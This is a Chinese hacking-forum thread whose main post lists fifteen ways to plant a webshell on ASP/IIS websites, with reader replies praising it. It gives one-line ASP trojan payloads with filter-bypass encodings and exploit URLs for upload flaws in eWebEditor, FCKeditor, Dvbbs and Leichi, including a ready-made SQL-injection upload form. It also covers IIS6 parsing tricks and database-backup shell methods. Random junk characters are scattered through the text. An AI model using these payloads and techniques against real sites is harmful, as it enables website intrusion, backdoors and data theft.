返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
1 A1 V, @$ P8 R
& A1 z# y# {  ?# ], i: I, K2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp. q& l* n5 c! v5 ?4 _& o

2 [. ?1 K4 P' [6 s" o7 V3.上传漏洞:
9 e7 J5 P% n# f+ B5 y0 v0 g& m5 d& s
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
" s( g" `0 C' j! e3 ~
4 o" M) s7 Y/ n  n6 T6 `; V8 H6 k1 X逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
6 A7 D0 A5 u$ d8 |5 i; u; b5 r- e4 y
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
2 Q1 x: R: E$ j' ]% v( y5 v然后在上传文件里面填要传的图片格式的ASP木马1 R$ u6 T! Z/ m0 i- Y5 G
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp/ H9 @3 t: x5 T
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传4 @& r9 ^; X. \# N3 D4 t. E% T

, d. u) ^# K9 x. h3 Q5 W# \<html>
+ ~- v! q5 ]7 a<head>! _* a  D; I" C
<title>ewebeditor upload.asp上传利用</title>4 l, ^# n0 w& U
</head>
" A8 {. J) ]$ p: W' \, Y<body>
, N" t$ [. \1 g: e" u% U<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
, j  I- J  `) O' U  m; U8 [<input type=file name=uploadfile size=100><br><br>
* O* H8 n. e* {. Z8 b<input type=submit value=Fuck>: i4 F& ]% z5 O4 A8 s
</form>
( l" }8 T# H3 K6 f* U& d" z</body>
. k6 }: l# o! C4 k1 Q</form>
" j7 U! x& b; p2 b# @+ e; f</html>
, K' ]4 f: C9 x5 X5 j, O" f
1 A, K$ k4 }+ Z( e/ D0 E0 ?2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
/ K5 b# F, x9 ~: l7 b5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp8 B( T- w$ w; Q7 D/ X9 B, O

$ G& p- z, `. Q) ]3 b; O# q6 T/ }6 o% J利用windows2003解析。建立zjq.asp的文件夹& D, v) T, g5 J5 c$ d# t

+ E! l0 M- @, s5 E/ \9 D' L- }, ^6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型* h- w6 r+ Y% g2 ~$ G, M" o

6 l9 v6 }0 p0 m; c9 L7.cuteeditor:类似ewebeditor# Q( z& x) t4 r+ h- b

: m7 U& ~- Q, d8.htmleditor:同上) h$ t% M3 Y% ^" r! M4 D/ @
  C1 }/ U* t" N) U
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
- T" d  f! s& K0 D: w2 b5 B7 ?
( w6 \: h5 H4 {* @<%execute request("value")%><%'<% loop <%:%>. I! C  F% Z: F& _1 ^* G( ?9 N
6 Y! N5 I" C% n& l0 b3 }, j
<%'<% loop <%:%><%execute request("value")%>& T- J) w( e; F& k1 p

* C6 t% n  s4 m2 f; e( K/ u<%execute request("value")'<% loop <%:%>
8 L0 a- Q1 D/ g' @4 b+ d, T9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
! ]1 s- T4 d3 v$ W4 @
5 k/ a. o5 G) b/ M6 w10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞! C" j/ r  D. _! x' W! p9 o1 o

. j" i- U8 G7 v1 o& z11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
9 _0 f# p- v6 w
% _; z! _% f  Y+ X8 \" z9 g# i解析漏洞得到webshell
7 M! C) l+ T$ [- Q3 |0 B3 @' I2 D2 a/ l
- L+ z2 d. }) I' v$ m6 w7 Y12.mssql差异备份,日志备份,前提需知道web路径
; t: ~) R/ Y2 j, ?  K3 T
/ T' G7 c4 \/ N  ?13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
6 b# k4 F3 E7 a8 ]
4 P" X+ P- R% Z4 X7 K% J% [( `14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell* s! p2 H* `2 e$ w

7 ~+ U$ e1 c* j* f* N2 D+ M4 ~" v15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可7 m- m* K: J" m) v1 Q

% v% y/ `# _* n2 G8 H以上只是本人的一些拙见,并不完善,以后想到了再继续添加$ H; j% r! ?2 ~- e; z! z- @
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 ) ^& x. w  B: S1 M! c
+ Q! H  U5 a7 }" _7 X
' S7 e6 f, k1 ~' l, V; g
很好啊、基本的入侵方法都包含了
0 `- r+ w, r9 W
% V7 h2 I, D; ^0 R- A9 B最好来个提权的帖子再。
( _$ v9 E$ ~; T. T! K6 s6 w! ~# Q) l0 S
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表